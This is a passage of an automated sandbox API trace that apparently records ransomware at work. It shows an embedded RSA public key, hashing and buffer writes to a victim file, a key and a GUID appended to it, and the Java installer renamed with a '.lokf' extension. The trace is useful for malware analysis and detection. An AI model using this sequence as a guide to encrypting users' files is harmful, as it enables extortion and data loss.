KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.369] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b88b8) returned 1 [0061.370] CryptCreateHash (in: hProv=0x6b88b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.370] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.370] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0061.370] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.370] GetLastError () returned 0x0 [0061.370] CryptDestroyHash (hHash=0x327cb80) returned 1 [0061.370] CryptReleaseContext (hProv=0x6b88b8, dwFlags=0x0) returned 1 [0061.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0061.370] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.370] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.370] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0061.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25810) returned 0x9c8dae8 [0061.371] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0061.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0061.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0061.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0061.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0061.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86ec0 [0061.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c862c8 [0061.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86f08 [0061.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c862e0 [0061.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86310 [0061.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0061.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86328 [0061.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0061.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0061.372] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0061.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86310 | out: hHeap=0x660000) returned 1 [0061.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86328 | out: hHeap=0x660000) returned 1 [0061.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0061.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0061.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0061.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0061.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86328 [0061.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0061.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c86310 [0061.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0061.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0061.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0061.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0061.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0061.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0061.372] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0061.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0061.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86328 | out: hHeap=0x660000) returned 1 [0061.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0061.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86310 | out: hHeap=0x660000) returned 1 [0061.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0061.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0061.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0061.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0061.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0061.373] GetCurrentThreadId () returned 0x9e0 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8c9a0 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b88b8 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.373] GetCurrentThreadId () returned 0x9e0 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0061.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fb18 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0061.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0061.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0061.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86310 [0061.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0061.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0061.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0061.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0061.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0061.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0061.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0061.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86328 [0061.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0061.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0061.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0061.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c862f8 [0061.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0061.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0061.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0061.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0061.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0061.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0061.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0061.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0061.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86340 [0061.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0061.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0061.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0061.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0061.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0061.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0061.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0061.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86310 | out: hHeap=0x660000) returned 1 [0061.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86310 [0061.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0061.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0061.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x9c87710 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0061.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245620 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86310 | out: hHeap=0x660000) returned 1 [0061.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32947b0 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0061.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b88b8 | out: hHeap=0x660000) returned 1 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245620 | out: hHeap=0x660000) returned 1 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c87710 | out: hHeap=0x660000) returned 1 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86340 | out: hHeap=0x660000) returned 1 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0061.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86328 | out: hHeap=0x660000) returned 1 [0061.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862f8 | out: hHeap=0x660000) returned 1 [0061.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0061.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0061.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0061.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862e0 | out: hHeap=0x660000) returned 1 [0061.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86f08 | out: hHeap=0x660000) returned 1 [0061.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0061.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fb18 | out: hHeap=0x660000) returned 1 [0061.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0061.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0061.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0061.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0061.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0061.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0061.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0061.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0061.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0061.376] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8dae8*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8dae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x25800, lpOverlapped=0x0) returned 1 [0061.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8dae8 | out: hHeap=0x660000) returned 1 [0061.377] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xdd600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.377] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f6f8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f6f8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0061.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0061.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0061.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0061.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0061.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0061.377] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0061.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0061.377] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.377] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.377] CloseHandle (hObject=0x5cc) returned 1 [0061.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290508 [0061.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0061.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290508 | out: hHeap=0x660000) returned 1 [0061.377] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi.lokf")) returned 1 [0061.378] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.378] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.378] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31c46f0 | out: hHeap=0x660000) returned 1 [0061.379] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68d26e60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xdd600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45.msi", cAlternateFileName="JRE170~1.MSI")) returned 0 [0061.379] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0061.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adf40 | out: hHeap=0x660000) returned 1 [0061.379] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0061.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262b28 | out: hHeap=0x660000) returned 1 [0061.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290398 | out: hHeap=0x660000) returned 1 [0061.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32900b8 | out: hHeap=0x660000) returned 1 [0061.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290730 | out: hHeap=0x660000) returned 1 [0061.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32907e8 | out: hHeap=0x660000) returned 1 [0061.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0061.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ae070 | out: hHeap=0x660000) returned 1 [0061.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0061.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262b28 [0061.379] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.380] 